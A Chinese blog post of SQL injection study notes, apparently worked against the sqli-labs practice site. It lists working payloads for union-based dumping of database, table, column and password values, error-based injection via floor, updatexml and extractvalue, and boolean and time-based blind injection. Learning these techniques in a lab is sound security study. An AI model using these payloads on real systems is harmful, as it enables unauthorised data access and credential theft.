<!DOCTYPE html>
<html>
  <head><meta name="generator" content="Hexo 3.9.0">
<meta name="google-site-verification" content="fQ_tfBgNjE9NQcpKnGAkWapHoKuimF5lVuNuqpPXar0">
    <meta charset="utf-8">
    
    <title>SQL注入学习笔记 | Xiao Leung&#39;s Blog</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    
      <link rel="icon" href="/favicon.png">
    

    <link rel="stylesheet" href="/css/style.css">

    <link rel="stylesheet" href="/js/google-code-prettify/tomorrow-night-eighties.min.css">

  </head>

  <body>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body></html>
<header>

	<a id="logo" href="/" title="Xiao Leung&#39;s Blog">
	<img src="/favicon.png" alt="Xiao Leung&#39;s Blog"></a>
	
	
		<!--搜索栏-->
		<i class="js-toggle-search iconfont icon-search"></i>


<form class="js-search search-form search-form--modal" method="get" action="http://gushi.li" role="search">
	<div class="search-form__inner">
		<div>
			<i class="iconfont icon-search"></i>
			<input class="text-input" placeholder="Enter Key..." type="search">
		</div>
	</div>
</form>
	

	
		<!--侧边导航栏-->
		<a id="nav-toggle" href="#"><span></span></a>

<nav>
	<div class="menu-top-container">
		<ul id="menu-top" class="menu">
			
				
				<li class="current-menu-item">
					<a href="https://www.plasf.cn/2019/08/01/HelloWorld/" target="_blank">AboutMe</a>
				</li>
			
				
				<li class="current-menu-item">
					<a href="https://www.plasf.cn/HXCTF/" target="_blank">HXCTF</a>
				</li>
			
		</ul>
	</div>
</nav>
	

</header>

<div class="m-header ">
	<section id="hero1" class="hero">
		<div class="inner">
		</div>
	</section>
	
		<figure class="top-image" data-enable=true></figure>
	
</div>

<!--文章列表-->
<div class="wrapper">
  
    <!--文章-->
<article>
	
  
    <h1 class="post-title" itemprop="name">
      SQL注入学习笔记
    </h1>
  

	<div class='post-body mb'>
		<ul>
<li>时间：2019年8月6日21:39:22</li>
<li>地点：福州大学</li>
</ul>
<h3 id="单引号字符型注入"><a href="#单引号字符型注入" class="headerlink" title="单引号字符型注入"></a>单引号字符型注入</h3><h4 id="漏洞特征"><a href="#漏洞特征" class="headerlink" title="漏洞特征"></a>漏洞特征</h4><p>​     and 1=2 时候任然返回正常，但是” ’ “时会报错</p>
<ul>
<li><strong>sql语句</strong>：</li>
</ul>
<pre><code class="mysql">&#39;order by 1,2,3--+</code></pre>
<ul>
<li><p><strong>语义</strong>：查询表中有几个字段，如果字段超过实际个数将会报错</p>
</li>
<li><p><strong>eg</strong>:</p>
</li>
</ul>
<pre><code class="html">http://www.sql.com/Less-1/?id=1%27%20order%20by%201,2,3%20--+</code></pre>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/15649678592883.png" alt="1564883718907"></p>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/15649679094636.png" alt="1564884099855"></p>
<h4 id="检测回显位"><a href="#检测回显位" class="headerlink" title="检测回显位"></a>检测回显位</h4><ul>
<li><strong>sql语句：</strong></li>
</ul>
<pre><code class="mysql">union select 1,2,3--+                    </code></pre>
<ul>
<li><p><strong>语义：</strong>查询存在的表段中的显位。使用时候将id改成不存在的id值然后查询。如果返回位有显示，则在该返回位可以进行查询</p>
</li>
<li><p><strong>eg:</strong></p>
</li>
</ul>
<pre><code>http://www.sql.com/Less-1/?id=-1%27%20union%20select%201,2,3--+</code></pre><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/15649682028375.png" alt="1564884653714"></p>
<h4 id="爆数据库"><a href="#爆数据库" class="headerlink" title="爆数据库"></a>爆数据库</h4><ul>
<li><strong>sql语句：</strong>                    </li>
</ul>
<pre><code class="mysql">select group_concat(schema_name)from information_schema.schemata#注意：group_concat()是将返回的数据当做一行输出</code></pre>
<ul>
<li><strong>语义：</strong>查询information_schema数据库中的shcemata中的schema_name表段的内容，该数据库的该表段储存了Mysql所有数据库的名字（Mysql5.5+）</li>
<li><strong>eg:</strong></li>
</ul>
<pre><code>http://www.sql.com/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(schema_name)%20from%20information_schema.schemata),3--+</code></pre><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/15649682417938.png" alt="1564885490338"></p>
<h4 id="爆表名"><a href="#爆表名" class="headerlink" title="爆表名"></a>爆表名</h4><ul>
<li><strong>sql语句:</strong></li>
</ul>
<pre><code class="mysql">select group_concat(table_name)from information_schema.tables where table_schema=&#39;security&#39; --+</code></pre>
<ul>
<li><strong>语义：</strong>查询information_schema数据库中的tables表中的table_name内容条件为table_schema（保存数据库名字）为security,该语句将会爆出该数据库的所有表名</li>
<li><strong>eg:</strong></li>
</ul>
<pre><code>http://www.sql.com/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(table_name)from%20information_schema.tables%20where%20table_schema=%27security%27),3--+</code></pre><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/15649683003970.png" alt="1564885936768"></p>
<h4 id="爆表段"><a href="#爆表段" class="headerlink" title="爆表段"></a>爆表段</h4><ul>
<li><strong>sql语句：</strong></li>
</ul>
<pre><code class="mysql">select group_concat(column_name)from information_schema.columns where table_name=&#39;users&#39;</code></pre>
<ul>
<li><strong>语义:</strong>  该语句查询information_schema数据库中的columns表中column_name表段的值，条件table_name=’users‘,该语句可以查询出改表的所有表段</li>
<li><strong>eg:</strong></li>
</ul>
<pre><code>http://www.sql.com/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(column_name)from%20information_schema.columns%20where%20table_name=%27users%27),3--+</code></pre><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/15649683779377.png" alt="1564886738794"></p>
<h4 id="爆表段值"><a href="#爆表段值" class="headerlink" title="爆表段值"></a>爆表段值</h4><ul>
<li><strong>sql语句:</strong></li>
</ul>
<pre><code class="mysql">select group_concat(password) from security.user</code></pre>
<ul>
<li><strong>语义:</strong>查询security数据库中的user表中的password表段的所有值，查询用户名类似。</li>
<li><strong>eg:</strong></li>
</ul>
<pre><code>http://www.sql.com/Less-1/?id=-1%27%20union%20select%201,(select%20group_concat(password)%20from%20security.users),3--+</code></pre><p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190805/1564968443135.png" alt="1564887127624"></p>
<p>(完)</p>
<h3 id="数值型注入"><a href="#数值型注入" class="headerlink" title="数值型注入"></a>数值型注入</h3><p><strong>标志：</strong>使用and1=1 和and 1=2时候出现页面变化说明是数值型注入。具体流程与上面一样，但是无需使用（’）作为闭合。</p>
<h3 id="单引号括型字符型注入"><a href="#单引号括型字符型注入" class="headerlink" title="单引号括型字符型注入"></a>单引号括型字符型注入</h3><ul>
<li><strong>标志：</strong> 使用and 1= 1和and 1=2 返回无差异说明是字符型注入，使用单引号闭合再使用order by 爆出语法错误，使用  ‘) 闭合可以正常注入。</li>
</ul>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><p>若存在注入，但是并没有显位，但是页面存在报错代码，那么可以通过报错作为显位。</p>
<ul>
<li><strong>报错注入的三种方式：</strong></li>
</ul>
<ol>
<li><p>通过floor报错</p>
<pre><code class="mysql">and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by x)a)</code></pre>
<p> 输出字符长度限制为64个字符</p>
<p> 输出字符长度限制为64个字符</p>
</li>
<li><p>通过updatexml报错</p>
<pre><code class="mysql">and updatexml(1,payload,1)</code></pre>
<p>同样该语句对输出的字符长度也做了限制，其最长输出32位<br>该语句对payload的返回类型也做了限制，只有在payload返回的不是xml格式才会生效</p>
<p>同样该语句对输出的字符长度也做了限制，其最长输出32位<br>并且该语句对payload的反悔类型也做了限制，只有在payload返回的不是xml格式才会生效</p>
</li>
<li><p>通过ExtractValue报错</p>
<pre><code class="mysql">and extractvalue(1, payload)</code></pre>
<p>输出字符有长度限制，最长32位。</p>
<p>输出字符有长度限制，最长32位。</p>
</li>
</ol>
<p>例子：</p>
<p><img src="https://www.mycute.cn/static/umeditor/php/upload/20190806/1565058715692.png" alt></p>
<h4 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h4><pre><code class="mysql">#布尔盲注可能用到的函数
ascii()#括号中的参数转化成相应的ascii码
ORD()与ascii()#用法类似
substr()substr(a,b,c)#从b 位置开始，截取字符串a 的c 长度。
mid()用法与substr（）#类似
length()#返回str字符串的长度
left(database(),1) #取database字符串的左边第一个</code></pre>
<p>例子</p>
<pre><code class="mysql">&#39; and mid(version(),2,1)=&#39;.&#39; --+</code></pre>
<p>语义:mid用于截断版本号的第二位是不是等于“.”如果是则放回TURE否则FALSE</p>
<pre><code class="mysql">#爆出数据库版本：
and mid(version(),1,1)=1
#爆出数据库用户：
and ascii(mid(user(),1,1))&gt;18
#爆出表名：
and ascii(mid((select table_name from information_schema.tables where table_schema=&#39;security&#39; limit 0,1),1,1))&gt;18</code></pre>
<h4 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h4><pre><code class="mysql">if(ascii(substr(database(),1,1))&gt;115,0,sleep(5))%23 //if 判断语句， 条件为假，执行 sleep</code></pre>
<h4 id="SQL注入高级用法（读写文件）"><a href="#SQL注入高级用法（读写文件）" class="headerlink" title="SQL注入高级用法（读写文件）"></a><strong>SQL注入高级用法（读写文件）</strong></h4><p>(后续补入)</p>

	</div>
	<div class="meta split">
		
			<span>本文总阅读量 <span id="busuanzi_value_page_pv"></span> 次</span>
		
		<time class="post-date" datetime="2019-08-04T02:05:54.000Z" itemprop="datePublished">2019-08-04</time>
	</div>
</article>

<!--评论-->

	
<div class="ds-thread" data-thread-key="SQl注入学习笔记" data-title="SQL注入学习笔记" data-url="http://www.plasf.cn/2019/08/04/SQl注入学习笔记/"></div>
<script type="text/javascript">

var duoshuoQuery = {short_name:"yumemor"};
	(function() {
		var ds = document.createElement('script');
		ds.type = 'text/javascript';ds.async = true;
		ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
		ds.charset = 'UTF-8';
		(document.getElementsByTagName('head')[0]
		 || document.getElementsByTagName('body')[0]).appendChild(ds);
	})();
</script>


  
</div>


  <svg id="bigTriangleColor" width="100%" height="40" viewBox="0 0 100 102" preserveAspectRatio="none">
    <path d="M0 0 L50 100 L100 0 Z"></path>
  </svg>

  


  <div class="wrapper"></div>





<div class="fat-footer">
	<div class="wrapper">
		<div class="layout layout--center">
			<div class="layout__item palm-mb">
				<div class="media">
					<img class="headimg" src='/assets/blogImg/litten.png' alt='XiaoLeung'>
					<div class="media__body">
						<h4>兵至如归-Xiaoleung&#39;s Blog</h4>
						<p class='site-description'>Don&#39;t forget why we started</p>
					</div>
				</div>
				<div class="author-contact">
					<ul>
						
							
							<li>
				        		<a href="https://github.com/sharpleung" target="_blank">
				        			
				        				<i class="iconfont icon-github"></i>
				        			
				        		</a>
				        	</li>
						
					</ul>
				</div>
			</div>
		</div>
	</div>
</div>

<footer class="footer" role="contentinfo">
	<div class="wrapper wrapper--wide split split--responsive">
<a href="http://beian.miit.gov.cn/">粤ICP备18132442号-1</a><br>
<a target="_blank" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=44011202000643" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"><img src="http://beian.gov.cn/img/ghs.png" style="float:left;"/><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">粤公网安备 44011202000643号</p></a><br>

		
			<span>本站总访问量 <span id="busuanzi_value_site_pv"></span> 次, 访客数 <span id="busuanzi_value_site_uv"></span> 人次</span>
		
		<span>Theme by <a href="http://github.com/justpsvm">justpsvm</a>. Powered by <a href="http://hexo.io">Hexo</a></span>
	</div>
</footer>

	<!-－这里导入了 lib.js 里面涵盖了 jQuery 等框架 所以注释掉-->
	<!--<script src="http://lib.sinaapp.com/js/jquery/2.0/jquery.min.js"></script>-->
	<script src="/js/lib.js"></script>
	<script src="/js/google-code-prettify/prettify.js"></script>
	<script src="/js/module.js"></script>
	<script src="/js/script.js"></script>
	
		<script async src="http://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	
	<script type='text/javascript'>
		//代码高亮
		$(document).ready(function(){
	 		$('pre').addClass('prettyprint linenums').attr('style', 'overflow:auto;');
   			prettyPrint();
		});
	</script>
	<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
 <script type="text/javascript"> /* 鼠标点击特效 - 7Core.CN */ var a_idx = 0;jQuery(document).ready(function($) {$("body").click(function(e) {var a = new Array("富强", "民主", "文明", "和谐", "自由", "平等", "公正" ,"法治", "爱国", "敬业", "诚信", "友善");var $i = $("<span/>").text(a[a_idx]); a_idx = (a_idx + 1) % a.length;var x = e.pageX,y = e.pageY;$i.css({"z-index": 100000000,"top": y - 20,"left": x,"position": "absolute","font-weight": "bold","color": "#ff6651"});$("body").append($i);$i.animate({"top": y - 180,"opacity": 0},1500,function() {$i.remove();});});}); </script>

